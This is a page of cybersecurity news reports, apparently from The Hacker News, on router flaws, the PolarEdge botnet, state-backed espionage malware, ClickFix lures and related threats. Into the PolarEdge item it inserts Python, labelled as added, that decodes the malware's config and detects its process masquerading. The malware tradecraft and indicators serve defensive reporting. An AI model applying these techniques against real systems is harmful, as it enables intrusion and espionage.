Tag: Cyber Threats

  • TP-Link Patches Four Omada Gateway Flaws, Two Allow Remote Code Execution

    Oct 22, 2025 | Ravie Lakshmanan | Vulnerability / Network Security

    TP-Link has released security updates to address four security flaws impacting Omada gateway devices, including two critical bugs that could result in arbitrary code execution.

    The vulnerabilities in question are listed below –

    • CVE-2025-6541 (CVSS score: 8.6) – An operating system command injection vulnerability that could be exploited by an attacker who can log in to the web management interface to run arbitrary commands
    • CVE-2025-6542 (CVSS score: 9.3) – An operating system command injection vulnerability that could be exploited by a remote unauthenticated attacker to run arbitrary commands
    • CVE-2025-7850 (CVSS score: 9.3) – An operating system command injection vulnerability that could be exploited by an attacker in possession of an administrator password of the web portal to run arbitrary commands
    • CVE-2025-7851 (CVSS score: 8.7) – An improper privilege management vulnerability that could be exploited by an attacker to obtain the root shell on the underlying operating system under restricted conditions
    “Attackers may execute arbitrary commands on the device’s underlying operating system,” TP-Link said in an advisory released Tuesday.

    The issues impact the following product models and versions –

    • ER8411 < 1.3.3 Build 20251013 Rel.44647
    • ER7412-M2 < 1.1.0 Build 20251015 Rel.63594
    • ER707-M2 < 1.3.1 Build 20251009 Rel.67687
    • ER7206 < 2.2.2 Build 20250724 Rel.11109
    • ER605 < 2.3.1 Build 20251015 Rel.78291
    • ER706W < 1.2.1 Build 20250821 Rel.80909
    • ER706W-4G < 1.2.1 Build 20250821 Rel.82492
    • ER7212PC < 2.1.3 Build 20251016 Rel.82571
    • G36 < 1.1.4 Build 20251015 Rel.84206
    • G611 < 1.2.2 Build 20251017 Rel.45512
    • FR365 < 1.1.10 Build 20250626 Rel.81746
    • FR205 < 1.0.3 Build 20251016 Rel.61376
    • FR307-M2 < 1.2.5 Build 20251015 Rel.76743

    While TP-Link makes no mention of the flaws being exploited in the wild, it’s advised that users move quickly to download and update to the latest firmware to fix the vulnerabilities.

    “Check the configurations of the device after the firmware upgrade to ensure that all settings remain accurate, secure, and aligned with their intended preferences,” it added.

    It also noted in a disclaimer that it cannot bear any responsibility for any consequences that may arise if the aforementioned recommended actions are not adhered to.


    Source: thehackernews.com…

  • PolarEdge Targets Cisco, ASUS, QNAP, Synology Routers in Expanding Botnet Campaign

    Oct 21, 2025 | Ravie Lakshmanan | Malware / Vulnerability

    Cybersecurity researchers have shed light on the inner workings of a botnet malware called PolarEdge.

    PolarEdge was first documented by Sekoia in February 2025, attributing it to a campaign targeting routers from Cisco, ASUS, QNAP, and Synology with the goal of corralling them into a network for an as-yet-undetermined purpose.

    The TLS-based ELF implant, at its core, is designed to monitor incoming client connections and execute commands within them.

    Then, in August 2025, attack surface management platform Censys detailed the infrastructural backbone powering the botnet, with the company noting that PolarEdge exhibits characteristics that are consistent with an Operational Relay Box (ORB) network. There is evidence to suggest that the activity involving the malware may have started as far back as June 2023.

    In the attack chains observed in February 2025, the threat actors have been observed exploiting a known security flaw impacting Cisco routers (CVE-2023-20118) to download a shell script named “q” over FTP, which is then responsible for retrieving and executing the PolarEdge backdoor on the compromised system.

    “The backdoor’s primary function is to send a host fingerprint to its command-and-control server and then listen for commands over a built-in TLS server implemented with mbedTLS,” the French cybersecurity company said in a technical breakdown of the malware.

    PolarEdge is designed to support two modes of operation: a connect-back mode, where the backdoor acts as a TLS client to download a file from a remote server, and debug mode, where the backdoor enters into an interactive mode to modify its configuration (i.e., server information) on-the-fly.

    The configuration is embedded in the final 512 bytes of the ELF image, obfuscated by a one-byte XOR that can be decrypted with single-byte key 0x11.
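As an added illustration (this is not Sekoia's tooling and not code from the original report), the following Python shows how a defender triaging a suspected PolarEdge sample would carve the trailing 512-byte configuration and undo the single-byte XOR described above, then sanity-check that the result actually looks like a config before trusting the key. The ELF image, the config layout (NUL-separated key=value strings) and the hostname in it are constructed for the example and are assumptions, not observed values.

```python
CONFIG_SIZE = 512  # per the report: config sits in the final 512 bytes of the ELF image
XOR_KEY = 0x11     # per the report: single-byte XOR key


def extract_config(elf_image: bytes) -> bytes:
    """Return the trailing config blob with the single-byte XOR removed."""
    if len(elf_image) < CONFIG_SIZE:
        raise ValueError("image shorter than the 512-byte config trailer")
    trailer = elf_image[-CONFIG_SIZE:]
    return bytes(b ^ XOR_KEY for b in trailer)


def looks_like_config(decoded: bytes, threshold: float = 0.8) -> bool:
    """Cheap sanity check: ignoring NUL padding, a correctly decoded config
    should be mostly printable ASCII. Random data, or the wrong key, fails."""
    meaningful = [b for b in decoded if b != 0]
    if not meaningful:
        return False
    printable = sum(1 for b in meaningful if 32 <= b < 127 or b in (9, 10, 13))
    return printable / len(meaningful) >= threshold


def printable_strings(blob: bytes, min_len: int = 4) -> list[str]:
    """Pull printable ASCII runs out of the decoded blob, like `strings`."""
    out, cur = [], bytearray()
    for b in blob:
        if 32 <= b < 127:
            cur.append(b)
            continue
        if len(cur) >= min_len:
            out.append(cur.decode("ascii"))
        cur = bytearray()
    if len(cur) >= min_len:
        out.append(cur.decode("ascii"))
    return out


def build_sample_image() -> bytes:
    """Constructed stand-in for a sample (assumption, not a real PolarEdge
    binary): a fake ELF header, some filler, then a made-up key=value config
    XOR-encoded with 0x11 and padded out to 512 bytes."""
    header = b"\x7fELF" + b"\x00" * 60
    filler = b"\x90" * 100
    plaintext = b"server=c2.example.invalid\x00port=443\x00mode=server\x00"
    plaintext = plaintext.ljust(CONFIG_SIZE, b"\x00")
    encoded = bytes(b ^ XOR_KEY for b in plaintext)
    return header + filler + encoded


if __name__ == "__main__":
    image = build_sample_image()
    config = extract_config(image)
    print("plausible config:", looks_like_config(config))
    for s in printable_strings(config):
        print(" ", s)
```

On a real sample the strings of interest are whatever the config carries (the report says server information); the `looks_like_config` check is there so that a firmware image that simply does not end in a PolarEdge trailer is not misread as one.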

    However, its default mode is to function as a TLS server in order to send a host fingerprint to the command-and-control (C2) server and wait for commands to be sent. The TLS server is implemented with mbedTLS v2.8.0 and relies on a custom binary protocol for parsing incoming requests matching specific criteria, including a parameter named “HasCommand.”

    If the “HasCommand” parameter equals the ASCII character 1, the backdoor proceeds to extract and run the command specified in the “Command” field and transmits back the raw output of the executed command.

    Once launched, PolarEdge also moves certain files (e.g., /usr/bin/wget, /sbin/curl) and deletes others (“/share/CACHEDEV1_DATA/.qpkg/CMS-WS/cgi-bin/library.cgi.bak”) on the infected device, although the exact purpose behind this step is unclear.

    Furthermore, the backdoor incorporates a wide range of anti-analysis techniques to obfuscate information related to the TLS server setup and fingerprinting logic. To evade detection, it employs process masquerading during its initialization phase by choosing from a predefined list a name at random. Some of the names included are: igmpproxy, wscd, /sbin/dhcpd, httpd, upnpd, and iapp.

    “Although the backdoor does not ensure persistence across reboots, it calls fork to spawn a child process that, every 30 seconds, checks whether /proc/<parent-pid> still exists,” Sekoia researchers explained. “If the directory has disappeared, the child executes a shell command to relaunch the backdoor.”
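As an added example, not from Sekoia's report, here is a heuristic triage pass in Python over a process-table snapshot that looks for the two behaviours just described: a process that calls itself one of the names on that list while its real executable (the /proc/<pid>/exe target) is something else, and a parent/child pair running the same binary under the same name, which is what the fork-based relaunch loop looks like from the outside. The record format and the sample process table are constructed assumptions.

```python
import os

# Process names the report says PolarEdge picks from at random.
POLAREDGE_NAMES = {"igmpproxy", "wscd", "/sbin/dhcpd", "httpd", "upnpd", "iapp"}
POLAREDGE_BASENAMES = {os.path.basename(n) for n in POLAREDGE_NAMES}


def suspicious_processes(procs):
    """Heuristic triage over a process snapshot.

    Assumed record shape (not a real tool's format): dicts with pid, ppid,
    name (the name shown by ps / argv[0]) and exe (resolved /proc/<pid>/exe).
    Flags:
      1. a PolarEdge-style name whose real executable has a different basename
         (process masquerading);
      2. a child whose parent runs the same executable under the same name
         (the fork-based watchdog that relaunches the backdoor).
    Returns a list of (pid, [reasons]); an empty list means nothing matched.
    """
    by_pid = {p["pid"]: p for p in procs}
    findings = []
    for p in procs:
        shown = os.path.basename(p["name"])
        if shown not in POLAREDGE_BASENAMES:
            continue
        reasons = []
        if os.path.basename(p["exe"]) != shown:
            reasons.append(f"name {p['name']!r} but executable is {p['exe']}")
        parent = by_pid.get(p["ppid"])
        if parent is not None and parent["exe"] == p["exe"] and parent["name"] == p["name"]:
            reasons.append(f"child of pid {parent['pid']} running the same binary (watchdog pattern)")
        if reasons:
            findings.append((p["pid"], reasons))
    return findings


# Constructed snapshot (not real telemetry): a legitimate httpd and igmpproxy,
# plus a pair of processes from a binary in /tmp that both call themselves "wscd".
SAMPLE_PROCS = [
    {"pid": 1,    "ppid": 0,    "name": "init",      "exe": "/sbin/init"},
    {"pid": 300,  "ppid": 1,    "name": "httpd",     "exe": "/usr/sbin/httpd"},
    {"pid": 310,  "ppid": 1,    "name": "igmpproxy", "exe": "/usr/sbin/igmpproxy"},
    {"pid": 4120, "ppid": 1,    "name": "wscd",      "exe": "/tmp/.t"},
    {"pid": 4121, "ppid": 4120, "name": "wscd",      "exe": "/tmp/.t"},
]


if __name__ == "__main__":
    for pid, reasons in suspicious_processes(SAMPLE_PROCS):
        print(pid, "; ".join(reasons))
```

On many router firmwares /proc/<pid>/exe is unreadable or absent; in that case compare /proc/<pid>/cmdline against /proc/<pid>/comm instead, and treat any hit as a lead for closer inspection rather than a verdict, since the check only looks at names.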

    The disclosure comes as Synthient highlighted GhostSocks’ ability to convert compromised devices into SOCKS5 residential proxies. GhostSocks is said to have been first advertised under the malware-as-a-service (MaaS) model on the XSS forum in October 2023.

    It’s worth noting that the offering has been integrated into Lumma Stealer as of early 2024, allowing customers of the stealer malware to monetize the compromised devices post-infection.

    “GhostSocks provides clients with the ability to build a 32-bit DLL or executable,” Synthient said in a recent analysis. “GhostSocks will attempt to locate a configuration file in %TEMP%. In the scenario that the configuration file cannot be found, it will fall back to a hard-coded config.”

    The configuration contains details of the C2 server to which a connection is established for provisioning the SOCKS5 proxy and ultimately spawning a connection using the open-source go-socks5 and yamux libraries.


    Source: thehackernews.com…

  • Meta Rolls Out New Tools to Protect WhatsApp and Messenger Users from Scams

    Oct 21, 2025 | Ravie Lakshmanan | Cryptocurrency / Encryption

    Meta on Tuesday said it’s launching new tools to protect Messenger and WhatsApp users from potential scams.

    To that end, the company said it’s introducing new warnings on WhatsApp when users attempt to share their screen with an unknown contact during a video call so as to prevent them from giving away sensitive information like bank details or verification codes.

    On Messenger, users can opt to enable a setting called “Scam detection” by navigating to Privacy & safety settings. Once it’s turned on, users are alerted when they receive a potentially suspicious message from an unknown connection that may contain signs of a scam.

    “Because detection happens on your device, chats with end-to-end encryption stay secure,” Meta said in a support document. “If you’re notified that a chat may contain signs of a scam, we’ll ask if you’d like to send recent messages you received to AI review. Messages that are shared with AI are no longer end-to-end encrypted.”

    If the review finds that it’s indeed a possible scam, users are given more information about common scams, such as job offers in exchange for money, opportunities promising fast cash, and work-from-home offers for jobs that can’t possibly be done remotely. Users are also provided options to block or report the account in question.

    As part of its ongoing efforts to combat scams, the social media giant said it took action on over 21,000 Facebook Pages and accounts masquerading as customer support in an attempt to trick people into sharing their personal information.

    In addition, Meta said it detected and disrupted close to 8 million accounts on Facebook and Instagram since the start of the year that are associated with criminal scam centers targeting people, including the elderly, across the world through messaging, dating apps, social media, crypto, and other apps. The scam compounds operated out of Myanmar, Laos, Cambodia, the United Arab Emirates, and the Philippines.

    These schemes, often called romance baiting (aka pig butchering), are run by cybercrime syndicates based out of Southeast Asia and refer to a type of investment fraud where criminals entice victims into depositing ever-larger sums into bogus platforms with promises of bigger returns.

    In many of the cases, the scammers – who are themselves trafficked into the region with lures of high-paying jobs and held against their will – initiate contact with victims through dating apps, social media platforms, or private messaging services like WhatsApp.

    Once they establish rapport, the operation moves to the next phase, with the threat actors steering victims toward supposed investment opportunities, often tied to cryptocurrencies, and deceiving them into depositing their funds and ultimately disappearing without a trace.

    “Central to the scam is psychological manipulation: perpetrators cultivate emotional bonds, instill confidence, and in some cases even simulate romantic relationships,” Infoblox noted in an analysis published earlier this month. “This drawn-out grooming process lowers victims’ defenses and primes them to believe in promises of extraordinary returns, leading to devastating financial losses.”


    Source: thehackernews.com…

  • Securing AI to Benefit from AI

    Artificial intelligence (AI) holds tremendous promise for improving cyber defense and making the lives of security practitioners easier. It can help teams cut through alert fatigue, spot patterns faster, and bring a level of scale that human analysts alone can’t match. But realizing that potential depends on securing the systems that make it possible.

    Every organization experimenting with AI in security operations is, knowingly or not, expanding its attack surface. Without clear governance, strong identity controls, and visibility into how AI makes its decisions, even well-intentioned deployments can create risk faster than they reduce it. To truly benefit from AI, defenders need to approach securing it with the same rigor they apply to any other critical system. That means establishing trust in the data it learns from, accountability for the actions it takes, and oversight for the outcomes it produces. When secured correctly, AI can amplify human capability instead of replacing it to help practitioners work smarter, respond faster, and defend more effectively.

    Establishing Trust for Agentic AI Systems

    As organizations begin to integrate AI into defensive workflows, identity security becomes the foundation for trust. Every model, script, or autonomous agent operating in a production environment now represents a new identity — one capable of accessing data, issuing commands, and influencing defensive outcomes. If those identities aren’t properly governed, the tools meant to strengthen security can quietly become sources of risk.

    The emergence of Agentic AI systems makes this especially important. These systems don’t just analyze; they may act without human intervention. They triage alerts, enrich context, or trigger response playbooks under delegated authority from human operators. Each action is, in effect, a transaction of trust. That trust must be bound to identity, authenticated through policy, and auditable end to end.

    The same principles that secure people and services must now apply to AI agents:

    • Scoped credentials and least privilege to ensure every model or agent can access only the data and functions required for its task.
    • Strong authentication and key rotation to prevent impersonation or credential leakage.
    • Activity provenance and audit logging so every AI-initiated action can be traced, validated, and reversed if necessary.
    • Segmentation and isolation to prevent cross-agent access, ensuring that one compromised process cannot influence others.

    In practice, this means treating every agentic AI system as a first-class identity within your IAM framework. Each should have a defined owner, lifecycle policy, and monitoring scope just like any user or service account. Defensive teams should continuously verify what those agents can do, not just what they were intended to do, because capability often drifts faster than design. With identity established as the foundation, defenders can then turn their attention to securing the broader system.

    Securing AI: Best Practices for Success

    Securing AI begins with protecting the systems that make it possible — the models, data pipelines, and integrations now woven into everyday security operations. Just as we secure networks and endpoints, AI systems must be treated as mission-critical infrastructure that requires layered and continuous defense.

    The SANS Secure AI Blueprint outlines a Protect AI track that provides a clear starting point. Built on the SANS Critical AI Security Guidelines, the blueprint defines six control domains that translate directly into practice:

    • Access Controls: Apply least privilege and strong authentication to every model, dataset, and API. Log and review access continuously to prevent unauthorized use.
    • Data Controls: Validate, sanitize, and classify all data used for training, augmentation, or inference. Secure storage and lineage tracking reduce the risk of model poisoning or data leakage.
    • Deployment Strategies: Harden AI pipelines and environments with sandboxing, CI/CD gating, and red-teaming before release. Treat deployment as a controlled, auditable event, not an experiment.
    • Inference Security: Protect models from prompt injection and misuse by enforcing input/output validation, guardrails, and escalation paths for high-impact actions.
    • Monitoring: Continuously observe model behavior and output for drift, anomalies, and signs of compromise. Effective telemetry allows defenders to detect manipulation before it spreads.
    • Model Security: Version, sign, and integrity-check models throughout their lifecycle to ensure authenticity and prevent unauthorized swaps or retraining.

    These controls align directly with NIST’s AI Risk Management Framework and the OWASP Top 10 for LLMs, which highlights the most common and consequential vulnerabilities in AI systems — from prompt injection and insecure plugin integrations to model poisoning and data exposure. Applying mitigations from those frameworks inside these six domains helps translate guidance into operational defense. Once these foundations are in place, teams can focus on using AI responsibly by knowing when to trust automation and when to keep humans in the loop.

    Balancing Augmentation and Automation

    AI systems are capable of assisting human practitioners like an intern that never sleeps. However, it is critical for security teams to differentiate what to automate from what to augment. Some tasks benefit from full automation, especially those that are repeatable, measurable, and low-risk if an error occurs. However, others demand direct human oversight because context, intuition, or ethics matter more than speed.

    Threat enrichment, log parsing, and alert deduplication are prime candidates for automation. These are data-heavy, pattern-driven processes where consistency outperforms creativity. By contrast, incident scoping, attribution, and response decisions rely on context that AI cannot fully grasp. Here, AI should assist by surfacing indicators, suggesting next steps, or summarizing findings while practitioners retain decision authority.

    Finding that balance requires maturity in process design. Security teams should categorize workflows by their tolerance for error and the cost of automation failure. Wherever the risk of false positives or missed nuance is high, keep humans in the loop. Wherever precision can be objectively measured, let AI accelerate the work.

    Join us at SANS Surge 2026!

    I’ll dive deeper into this topic during my keynote at SANS Surge 2026 (Feb. 23-28, 2026), where we’ll explore how security teams can ensure AI systems are safe to depend on. If your organization is moving fast on AI adoption, this event will help you move more securely. Join us to connect with peers, learn from experts, and see what secure AI in practice really looks like.

    Register for SANS Surge 2026 here.

    Note: This article was contributed by Frank Kim, SANS Institute Fellow.


    Source: thehackernews.com…

  • Hackers Used Snappybee Malware and Citrix Flaw to Breach European Telecom Network

    Oct 21, 2025 | Ravie Lakshmanan | Cyber Espionage / Network Security

    A European telecommunications organization is said to have been targeted by a threat actor that aligns with a China-nexus cyber espionage group known as Salt Typhoon.

    The organization, per Darktrace, was targeted in the first week of July 2025, with the attackers exploiting a Citrix NetScaler Gateway appliance to obtain initial access.

    Salt Typhoon, also known as Earth Estries, FamousSparrow, GhostEmperor, and UNC5807, is the name given to an advanced persistent threat actor with ties to China. Known to be active since 2019, the group gained prominence last year following its attacks on telecommunications services providers, energy networks, and government systems in the U.S.

    The adversary has a track record of exploiting security flaws in edge devices, maintaining deep persistence, and exfiltrating sensitive data from victims in more than 80 countries across North America, Europe, the Middle East, and Africa.

    In the incident observed against the European telecommunications entity, the attackers are said to have leveraged the foothold to pivot to Citrix Virtual Delivery Agent (VDA) hosts in the client’s Machine Creation Services (MCS) subnet, while also using SoftEther VPN to obscure their true origins.

    One of the malware families delivered as part of the attack is Snappybee (aka Deed RAT), a suspected successor to the ShadowPad (aka PoisonPlug) malware that has been deployed in prior Salt Typhoon attacks. The malware is launched by means of a technique called DLL side-loading, which has been adopted by a number of Chinese hacking groups over the years.

    “The backdoor was delivered to these internal endpoints as a DLL alongside legitimate executable files for antivirus software such as Norton Antivirus, Bkav Antivirus, and IObit Malware Fighter,” Darktrace said. “This pattern of activity indicates that the attacker relied on DLL side-loading via legitimate antivirus software to execute their payloads.”

    The malware is designed to contact an external server (“aar.gandhibludtric[.]com”) over HTTP and an unidentified TCP-based protocol. Darktrace said the intrusion activity was identified and remediated before it could escalate further.

    “Salt Typhoon continues to challenge defenders with its stealth, persistence, and abuse of legitimate tools,” the company added. “The evolving nature of Salt Typhoon’s tradecraft, and its ability to repurpose trusted software and infrastructure, ensures it will remain difficult to detect using conventional methods alone.”


    Source: thehackernews.com…

  • Google Identifies Three New Russian Malware Families Created by COLDRIVER Hackers

    Oct 21, 2025 | Ravie Lakshmanan | Cyber Espionage / Threat Intelligence

    A new malware attributed to the Russia-linked hacking group known as COLDRIVER has undergone numerous developmental iterations since May 2025, suggesting an increased “operations tempo” from the threat actor.

    The findings come from Google Threat Intelligence Group (GTIG), which said the state-sponsored hacking crew has rapidly refined and retooled its malware arsenal merely five days following the publication of its LOSTKEYS malware around the same time.

    While it’s currently not known for how long the new malware families have been under development, the tech giant’s threat intelligence team said it has not observed a single instance of LOSTKEYS since disclosure.

    The new malware, codenamed NOROBOT, YESROBOT, and MAYBEROBOT, is “a collection of related malware families connected via a delivery chain,” GTIG researcher Wesley Shields said in a Monday analysis.

    The latest attack waves are something of a departure from COLDRIVER’s typical modus operandi, which involves targeting high-profile individuals in NGOs, policy advisors, and dissidents for credential theft. In contrast, the new activity revolved around leveraging ClickFix-style lures to trick users into running malicious PowerShell commands via the Windows Run dialog as part of a fake CAPTCHA verification prompt.

    While the attacks spotted in January, March, and April 2025 led to the deployment of an information stealing malware known as LOSTKEYS, subsequent intrusions have paved the way for the “ROBOT” family of malware. It’s worth noting that the malware families NOROBOT and MAYBEROBOT are tracked by Zscaler ThreatLabz under the names BAITSWITCH and SIMPLEFIX, respectively.

    The new infection chain commences with an HTML ClickFix lure dubbed COLDCOPY that’s designed to drop a DLL called NOROBOT, which is then executed via rundll32.exe to drop the next-stage malware. Initial versions of this attack are said to have distributed a Python backdoor known as YESROBOT, before the threat actors switched to a PowerShell implant named MAYBEROBOT.

    YESROBOT uses HTTPS to retrieve commands from a hard-coded command-and-control (C2) server. A minimal backdoor, it supports the ability to download and execute files, and retrieve documents of interest. Only two instances of YESROBOT deployment have been observed to date, specifically over a two-week period in late May shortly after details of LOSTKEYS became public knowledge.

    In contrast, MAYBEROBOT is assessed to be more flexible and extensible, equipped with features to download and run a payload from a specified URL, run commands using cmd.exe, and run PowerShell code.

    It’s believed that the COLDRIVER actors rushed to deploy YESROBOT as a “stopgap mechanism” likely in response to public disclosure, before abandoning it in favor of MAYBEROBOT, as the earliest version of NOROBOT also included a step to download a full Python 3.8 installation onto the compromised host — a “noisy” artifact that’s bound to raise suspicion.

    Google also pointed out that the use of NOROBOT and MAYBEROBOT is likely reserved for significant targets, who may have been already compromised via phishing, with the end goal of gathering additional intelligence from their devices.

    “NOROBOT and its preceding infection chain have been subject to constant evolution — initially simplified to increase chances of successful deployment, before re-introducing complexity by splitting cryptography keys,” Shields said. “This constant development highlights the group’s efforts to evade detection systems for their delivery mechanism for continued intelligence collection against high-value targets.”

    The disclosure comes as the Netherlands’ Public Prosecution Service, known as the Openbaar Ministerie (OM), announced that three 17-year-old men have been suspected of providing services to a foreign government, with one of them alleged to be in contact with a hacker group affiliated with the Russian government.

    “This suspect also gave the other two instructions to map Wi-Fi networks on multiple dates in The Hague,” OM said. “The information collected has been shared with the client by the former suspect for a fee and can be used for digital espionage and cyber attacks.”

    Two of the suspects were apprehended on September 22, 2025, while the third suspect, who was also interviewed by authorities, has been kept under house arrest because of his “limited role” in the case.

    “There are no indications yet that pressure has been exerted on the suspect who was in contact with the hacker group affiliated with the Russian government,” the Dutch government body added.


    Source: thehackernews.com…

  • Five New Exploited Bugs Land in CISA's Catalog — Oracle and Microsoft Among Targets

    Oct 20, 2025 | Ravie Lakshmanan | Threat Intelligence / Data Security

    The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Monday added five security flaws to its Known Exploited Vulnerabilities (KEV) Catalog, officially confirming a recently disclosed vulnerability impacting Oracle E-Business Suite (EBS) has been weaponized in real-world attacks.

    The security defect in question is CVE-2025-61884 (CVSS score: 7.5), which has been described as a server-side request forgery (SSRF) vulnerability in the Runtime component of Oracle Configurator that could allow attackers unauthorized access to critical data.

    “This vulnerability is remotely exploitable without authentication,” CISA said.

    CVE-2025-61884 is the second flaw in Oracle EBS to be actively exploited along with CVE-2025-61882 (CVSS score: 9.8), a critical bug that could permit unauthenticated attackers to execute arbitrary code on susceptible instances.

    Earlier this month, Google Threat Intelligence Group (GTIG) and Mandiant revealed dozens of organizations may have been impacted following the exploitation of CVE-2025-61882.

    “At this time, we are not able to attribute any specific exploitation activity to a specific actor, but it’s likely that at least some of the exploitation activity we observed was conducted by actors now conducting Cl0p-branded extortion operations,” Zander Work, senior security engineer at GTIG, told The Hacker News last week.

    Also added by CISA to the KEV catalog are four other vulnerabilities –

    • CVE-2025-33073 (CVSS score: 8.8) – An improper access control vulnerability in Microsoft Windows SMB Client that could allow for privilege escalation (Fixed by Microsoft in June 2025)
    • CVE-2025-2746 (CVSS score: 9.8) – An authentication bypass using an alternate path or channel vulnerability in Kentico Xperience CMS that could allow an attacker to control administrative objects by taking advantage of the Staging Sync Server password handling of empty SHA1 usernames in digest authentication (Fixed in Kentico in March 2025)
    • CVE-2025-2747 (CVSS score: 9.8) – An authentication bypass using an alternate path or channel vulnerability in Kentico Xperience CMS that could allow an attacker to control administrative objects by taking advantage of the Staging Sync Server password handling for the server defined None type (Fixed in Kentico in March 2025)
    • CVE-2022-48503 (CVSS score: 8.8) – An improper validation of array index vulnerability in Apple’s JavaScriptCore component that could result in arbitrary code execution when processing web content (Fixed by Apple in July 2022)
    There are currently no details on how the aforementioned four issues are being exploited in the wild, although details about CVE-2025-33073, CVE-2025-2746, and CVE-2025-2747 were shared by researchers from Synacktiv and watchTowr Labs, respectively.

    Federal Civilian Executive Branch (FCEB) agencies are required to remediate identified vulnerabilities by November 10, 2025, to secure their networks against active threats.


    Source: thehackernews.com…

  • 131 Chrome Extensions Caught Hijacking WhatsApp Web for Massive Spam Campaign

    Oct 20, 2025 | Ravie Lakshmanan | Browser Security / Malware

    Cybersecurity researchers have uncovered a coordinated campaign that leveraged 131 rebranded clones of a WhatsApp Web automation extension for Google Chrome to spam Brazilian users at scale.

    The 131 spamware extensions share the same codebase, design patterns, and infrastructure, according to supply chain security company Socket. The browser add-ons collectively have about 20,905 active users.

    “They are not classic malware, but they function as high-risk spam automation that abuses platform rules,” security researcher Kirill Boychenko said. “The code injects directly into the WhatsApp Web page, running alongside WhatsApp’s own scripts, automates bulk outreach and scheduling in ways that aim to bypass WhatsApp’s anti-spam enforcement.”

    The end goal of the campaign is to blast outbound messaging via WhatsApp in a manner that bypasses the messaging platform’s rate limits and anti-spam controls.

    The activity is assessed to have been ongoing for at least nine months, with new uploads and version updates to the extensions observed as recently as October 17, 2025. Some of the identified extensions are listed below –

    • YouSeller (10,000 users)
    • performancemais (239 users)
    • Botflow (38 users)
    • ZapVende (32 users)

    The extensions have been found to embrace different names and logos, but, behind the scenes, the vast majority of them have been published by “WL Extensão” and its variant “WLExtensao.” It’s believed that the differences in branding are the result of a franchise model that allows the operation’s affiliates to flood the Chrome Web Store with various clones of the original extension offered by a company named DBX Tecnologia.

    These add-ons also claim to masquerade as customer relationship management (CRM) tools for WhatsApp, allowing users to maximize their sales through the web version of the application.

    “Turn your WhatsApp into a powerful sales and contact management tool. With Zap Vende, you’ll have an intuitive CRM, message automation, bulk messaging, visual sales funnel, and much more,” reads the description of ZapVende on the Chrome Web Store. “Organize your customer service, track leads, and schedule messages in a practical and efficient way.”

    DBX Tecnologia, per Socket, advertises a reseller white-label program to allow prospective partners to rebrand and sell its WhatsApp Web extension under their own brand, promising recurring revenue in the range of R$30,000 to R$84,000 by investing R$12,000.


    It’s worth noting that the practice is in violation of Google’s Chrome Web Store Spam and Abuse policy, which bans developers and their affiliates from submitting multiple extensions that provide duplicate functionality on the platform. DBX Tecnologia has also been found to have put out YouTube videos about bypassing WhatsApp’s anti-spam algorithms when using the extensions.

    “The cluster consists of near-identical copies spread across publisher accounts, is marketed for bulk unsolicited outreach, and automates message sending inside web.whatsapp.com without user confirmation,” Boychenko noted. “The goal is to keep bulk campaigns running while evading anti-spam systems.”

    The disclosure comes as Trend Micro, Sophos, and Kaspersky shed light on a large-scale campaign that’s targeting Brazilian users with a WhatsApp worm dubbed SORVEPOTEL that’s used to distribute a banking trojan codenamed Maverick.


    Source: thehackernews.com…

  • Analysing ClickFix: 3 Reasons Why Copy/Paste Attacks Are Driving Security Breaches

    Analysing ClickFix: 3 Reasons Why Copy/Paste Attacks Are Driving Security Breaches

    ClickFix, FileFix, fake CAPTCHA — whatever you call it, attacks where users interact with malicious scripts in their web browser are a fast-growing source of security breaches.

    ClickFix attacks prompt the user to solve some kind of problem or challenge in the browser — most commonly a CAPTCHA, but also things like fixing an error on a webpage.

    The name is a little misleading, though — the key factor in the attack is that it tricks users into running malicious commands on their device by copying malicious code from the page to the clipboard and running it locally.

    Examples of ClickFix lures used by attackers in the wild.

    ClickFix is known to be regularly used by the Interlock ransomware group and other prolific threat actors, including state-sponsored APTs. A number of recent public data breaches have been linked to ClickFix-style TTPs, such as Kettering Health, DaVita, City of St. Paul, Minnesota, and the Texas Tech University Health Sciences Centers (with many more breaches likely to involve ClickFix where the attack vector wasn’t known or disclosed).

    But why are these attacks proving to be so effective?

    Reason 1: Users aren’t ready for ClickFix

    For the past decade or more, user awareness has focused on stopping users from clicking links in suspicious emails, downloading risky files, and entering their username and password into random websites. It hasn’t focused on opening up a program and running a command.

    Suspicion is further reduced when you consider that the malicious clipboard copy action is performed behind the scenes via JavaScript 99% of the time.

    Example of unobfuscated JavaScript code performing the copy function automatically on a ClickFix page without user input.

    And with modern ClickFix sites and lures becoming increasingly legitimate-looking (see the example below), it’s not surprising that users are falling victim.

    One of the more legit-looking ClickFix lures — this one even has an embedded video showing the user what to do!

    And since these attacks are moving away from email altogether, they don’t fit the model of what users are trained to be suspicious of.

    The top delivery vector identified by Push Security researchers was SEO poisoning and malvertising via Google Search. By creating new domains or taking over legitimate ones, attackers are creating watering hole scenarios to intercept users browsing the internet.

    And even if you were suspicious, there’s no convenient “report phishing” button or workflow to notify your security team for Google Search results, social media messages, website ads, and so on.

    Reason 2: ClickFix isn’t being detected during delivery

    There are a few reasons why ClickFix attacks are going undetected by technical controls.

    ClickFix pages, like other modern phishing sites, are using a range of detection evasion techniques that prevent them from being flagged by security tools — from email scanners, to web-crawling security tools, to web proxies analyzing network traffic. Detection evasion mainly involves camouflaging and rotating domains to stay ahead of known-bad detections (i.e., blocklists), using bot protection to prevent analysis, and heavily obfuscating page content to stop detection signatures from firing.

    And by using non-email delivery vectors, an entire layer of detection opportunity is cut out.

    Like other modern phishing attacks, ClickFix lures are distributed all over the internet — not just email.

    Malvertising adds another layer of targeting to the picture. For example, Google Ads can be targeted to searches coming from specific geographic locations, tailored to specific email domain matches, or specific device types (e.g. desktop, mobile, etc.). If you know where your target is located, you can tailor the ad parameters accordingly.

    Along with other techniques, like conditional loading to return a lure appropriate for the victim’s operating system (or not triggering at all unless certain conditions are met, e.g. the visitor is on a mobile OS or outside a target IP range), attackers have a way of reaching a large number of potential victims while avoiding security controls at the email layer and preventing unwanted analysis.

    Example of a ClickFix lure built onto a vibe-coded site.

    Finally, because the code is copied inside the browser sandbox, typical security tools are unable to observe and flag this action as potentially malicious. This means that the last — and only — opportunity for organizations to stop ClickFix is on the endpoint, after the user has attempted to run the malicious code.

    Reason 3: EDR is the last and only line of defense — and it’s not foolproof

    There are multiple stages to the attack that can and should be intercepted by EDR, but the level of detection raised, and whether an action is blocked in real time, is driven by context.

    Because there’s no file download from the web, and the act of running code on the machine is initiated by the user, there’s no context tying the action to another application to make it appear suspicious. For example, malicious PowerShell executed from Outlook or Chrome would appear obviously suspicious, but because it’s user-initiated, it’s isolated from the context of where the code was delivered.

